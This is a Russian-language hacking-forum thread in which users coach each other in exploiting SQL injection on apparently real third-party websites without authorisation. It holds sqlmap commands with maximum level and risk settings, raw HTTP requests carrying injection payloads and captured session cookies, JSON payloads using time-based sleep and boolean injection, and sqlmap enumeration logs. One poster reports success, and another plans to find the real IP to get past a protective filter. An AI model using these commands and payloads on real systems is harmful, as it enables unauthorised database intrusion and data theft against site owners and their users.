Статья Сканируем и раскручиваем SQL Injection с умом

Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch

Такие вещи скринами не кидай, лучше текстом вставляй.
хорошо
 
Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch

Такие вещи скринами не кидай, лучше текстом вставляй.
Код:
GET /mall/html_popup.asp?itemid='%2B(select%20convert(int%2CCHAR(52)%2BCHAR(67)%2BCHAR(117)%2BCHAR(114)%2BCHAR(81)%2BCHAR(87)%2BCHAR(115)%2BCHAR(98)%2BCHAR(74)%2BCHAR(109)%2BCHAR(50))%20FROM%20syscolumns)%2B' HTTP/1.1
Cookie: ASPSESSIONIDCECBDBSB=DBNBJIKCMPKOJCLAOCDIMPJH; visitID=303254; viewList=22605; showItem=5=17712%5F%5F%BC%BA%C0%CE%B0%A3%C8%A3%C7%D0%A5%B0%2C%A5%B1%2D%5B%C0%CC%B7%D0%C6%AF%B0%AD%5D%2D2018%5F%5F%2Fmall%2Fimages%2Fproduct%2Fedumain%2Fexam%2F2020818101851%5F0%2E7055475%2Egif&3=16470%5F%5F%BA%B8%B0%C7%C0%C7%B7%E1%B9%FD%B1%D4%A5%B8%2D%5B%B9%AE%C1%A6%C7%AE%C0%CC%5D%5F%5F%2Fmall%2Fimages%2Fproduct%2Fedumain%2Fexam%2F2021429142324%5F0%2E7055475%2Ejpg&1=18137%5F%5F2022%B3%E2%B4%EB%BA%F1+%B0%A3%C8%A3%BB%E7+%B9%AE%C1%A6%C1%FD+%BC%BC%C6%AE%28%C0%FC%5F%5F%2Fmall%2Fimages%2Fproduct%2Fbook%5Fcover%2F2021317171414%5F0%2E7055475%2Egif&2=18141%5F%5F2022%B3%E2%B4%EB%BA%F1+%B0%A3%C8%A3%BB%E7+%B0%B3%B3%E4%BC%AD+%BC%BC%C6%AE%28%C0%FC%5F%5F%2Fmall%2Fimages%2Fproduct%2Fbook%5Fcover%2F2021317172053%5F0%2E7055475%2Egif&4=16456%5F%5F%B8%F0%BC%BA%B0%A3%C8%A3%C7%D0%A5%B2%2D%5B%C0%CC%B7%D0%C6%AF%B0%AD%5D%5F%5F%2Fmall%2Fimages%2Fproduct%2Fedumain%2Fexam%2F2021429141915%5F0%2E7055475%2Ejpg; papu%5Fcookie%5Flogin=pw=&id=&al=no
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: site.com
Connection: Keep-alive
 
Ну пробуй так как выше написал:

Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch

Еще можешь добавить original value который показывает акунетикс, например:
Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=947294*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch
Вместо 947294 подставить то значение которое показывает акунетикс как Original value. Если такого у тебя нет то инжекти как в первом варианте, просто со звездочкой.
 
Если ты новичок, убери batch и читай , что говорит скульмап.
level и risk тоже сразу не надо ставить, зачем лишние запросы?
 
Ну пробуй так как выше написал:

Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch

Еще можешь добавить original value который показывает акунетикс, например:
Код:
sqlmap.py -u "https://site.com/mall/html_popup.asp?itemid=947294*" --dbs --dbms="Microsoft SQL Server" --level=5 --risk=3 --random-agent --batch
Вместо 947294 подставить то значение которое показывает акунетикс как Original value. Если такого у тебя нет то инжекти как в первом варианте, просто со звездочкой
Все раскрутилось, большое спасибо за помощь
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
GET /mall/html_popup.asp?itemid='%2B(select%20convert(int%2CCHAR(52)%2BCHAR(67)%2BCHAR(117)%2BCHAR(114)%2BCHAR(81)%2BCHAR(87)%2BCHAR(115)%2BCHAR(98)%2BCHAR(74)%2BCHAR(109)%2BCHAR(50))%20FROM%20syscolumns)%2B' HTTP/1.1
Cookie: ASPSESSIONIDCECBDBSB=DBNBJIKCMPKOJCLAOCDIMPJH; visitID=303254; viewList=22605; showItem=5=17712%5F%5F%BC%BA%C0%CE%B0%A3%C8%A3%C7%D0%A5%B0%2C%A5%B1%2D%5B%C0%CC%B7%D0%C6%AF%B0%AD%5D%2D2018%5F%5F%2Fmall%2Fimages%2Fproduct%2Fedumain%2Fexam%2F2020818101851%5F0%2E7055475%2Egif&3=16470%5F%5F%BA%B8%B0%C7%C0%C7%B7%E1%B9%FD%B1%D4%A5%B8%2D%5B%B9%AE%C1%A6%C7%AE%C0%CC%5D%5F%5F%2Fmall%2Fimages%2Fproduct%2Fedumain%2Fexam%2F2021429142324%5F0%2E7055475%2Ejpg&1=18137%5F%5F2022%B3%E2%B4%EB%BA%F1+%B0%A3%C8%A3%BB%E7+%B9%AE%C1%A6%C1%FD+%BC%BC%C6%AE%28%C0%FC%5F%5F%2Fmall%2Fimages%2Fproduct%2Fbook%5Fcover%2F2021317171414%5F0%2E7055475%2Egif&2=18141%5F%5F2022%B3%E2%B4%EB%BA%F1+%B0%A3%C8%A3%BB%E7+%B0%B3%B3%E4%BC%AD+%BC%BC%C6%AE%28%C0%FC%5F%5F%2Fmall%2Fimages%2Fproduct%2Fbook%5Fcover%2F2021317172053%5F0%2E7055475%2Egif&4=16456%5F%5F%B8%F0%BC%BA%B0%A3%C8%A3%C7%D0%A5%B2%2D%5B%C0%CC%B7%D0%C6%AF%B0%AD%5D%5F%5F%2Fmall%2Fimages%2Fproduct%2Fedumain%2Fexam%2F2021429141915%5F0%2E7055475%2Ejpg; papu%5Fcookie%5Flogin=pw=&id=&al=no
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: site.com
Connection: Keep-alive
Этот кусок можно было просто в файл закинуть и запустить скулю с ключом -r.
sqlmap -r <requets filename>
Только, вероятно, без пэйлоада надо копировать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ребята приветствую! Подскажите как подружить с sqlmap?

test.jpg
test2.jpg
test3.jpg
там где гет параметр всё как обычно.
sqlmap -u https://..../ajax/media_music.php?type=0 --dbs
Пост запрос придется в текстовик переписать. Лучше это сделать через бурп. Заходишь на сайт и снифаешь этот запрос.
Как записал, то запускаешь так: sqlmap -r req.txt --dbs
 
Я залетаю по таргету sqlmap -u http://site/ajax/media_music.php?type=0 --dbs Базу видит. Но в окуне мне показывает уязвимость URL encoded GET input type was set to 1/(3*2-5) . Язык пока не знаю. Может пейлоадер не правильный. Подскажите мужики. Буду очень благодарен в будущем. Я на форуме долго останусь. Умные тут ребята)
 
Я залетаю по таргету sqlmap -u http://site/ajax/media_music.php?type=0 --dbs Базу видит. Но в окуне мне показывает уязвимость URL encoded GET input type was set to 1/(3*2-5) . Язык пока не знаю. Может пейлоадер не правильный. Подскажите мужики. Буду очень благодарен в будущем. Я на форуме долго останусь. Умные тут ребята)
http://site/ajax/media_music.php?type=1 --dbms=mysql --level=5 --risk=3 --batch
Запускай так. И для кого там указан original value ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Parameter:lang
POST /en/home

"req_type":"init","action":"document","id":"5271143","lang":"-1' OR 3*2*1=6 AND 000444=000444 -- "
как правильно sqlmap команду дать ?

--data="lang=*" не помогло.. риском 3 левелом 5
 
Parameter:lang
POST /en/home

"req_type":"init","action":"document","id":"5271143","lang":"-1' OR 3*2*1=6 AND 000444=000444 -- "
как правильно sqlmap команду дать ?

--data="lang=*" не помогло.. риском 3 левелом 5
https://xss.pro/threads/75306/#post-520086
И не надо дублировать один вопрос в разные топики. Этим ты не ускоришь получение ответа на свой вопрос.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
https://xss.pro/threads/75306/#post-520086
И не надо дублировать один вопрос в разные топики. Этим ты не ускоришь получение ответа на свой вопрос.
я понял что не там задал вопрос)))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
https://xss.pro/threads/75306/#post-520086
И не надо дублировать один вопрос в разные топики. Этим ты не ускоришь получение ответа на свой вопрос.
"req_type":"init","action":"document","id":"5271143","lang*"
не помогло но пруф есть (
 
Пожалуйста, обратите внимание, что пользователь заблокирован
{"req_type":"collection","req_code":{"page":"2","page_size":"64","filters":[],"changed_filters":"false","collection_type":"default","entity_id":"(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'\"+(select(0)from(select(sleep(6)))v)+\"*/","template_entity_id":"0","location_id":"5211865","location_key":"announcements"}}


{"\req_type\":"\collection\","\req_code\":{"\page\":"\2\"\,\"\page_size\":"\64\"\,\"\filters\"\:[],\"\changed_filters\":"\false\","\collection_type\":"\default\","\entity_id*\","\template_entity_id\":"\0\","\location_id\":"\5211865\","\location_key\":"\announcements\"}}
 
"req_type":"init","action":"document","id":"5271143","lang*"
не помогло но пруф есть (
"req_type":"init","action":"document","id":"5271143","lang","de*"
Вот так должно быть, язык ставь, который на сайте.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Parameter: JSON #4* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: {"req_type":"search","req_code":"the%' AND 339<(2) OR NOT 9340=9340-- FpZf4) AND '000amA7'!='000amA7%"}
---
[14:52:54] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[14:52:54] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[14:52:54] [INFO] fetching database (schema) names
[14:52:54] [INFO] fetching number of databases
[14:52:54] [INFO] retrieved:
[14:52:59] [ERROR] unable to retrieve the number of databases
[14:52:59] [INFO] falling back to current database
[14:52:59] [INFO] fetching current database
[14:52:59] [INFO] retrieving the length of query output
[14:52:59] [INFO] retrieved:
[14:53:03] [INFO] retrieved:
[14:53:06] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:53:06] [CRITICAL] unable to retrieve the database names

--no-cast --hex не помогает
 
Parameter: JSON #4* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: {"req_type":"search","req_code":"the%' AND 339<(2) OR NOT 9340=9340-- FpZf4) AND '000amA7'!='000amA7%"}
---
[14:52:54] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[14:52:54] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[14:52:54] [INFO] fetching database (schema) names
[14:52:54] [INFO] fetching number of databases
[14:52:54] [INFO] retrieved:
[14:52:59] [ERROR] unable to retrieve the number of databases
[14:52:59] [INFO] falling back to current database
[14:52:59] [INFO] fetching current database
[14:52:59] [INFO] retrieving the length of query output
[14:52:59] [INFO] retrieved:
[14:53:03] [INFO] retrieved:
[14:53:06] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:53:06] [CRITICAL] unable to retrieve the database names

--no-cast --hex не помогает
попробуй --dbms=postgresql --teqnique=US --level=5 --risk=3
Но скорее всего либо фильтр либо клауд.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
попробуй --dbms=postgresql --teqnique=US --level=5 --risk=3
Но скорее всего либо фильтр либо клауд.
думаю вариант найти ип (((
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх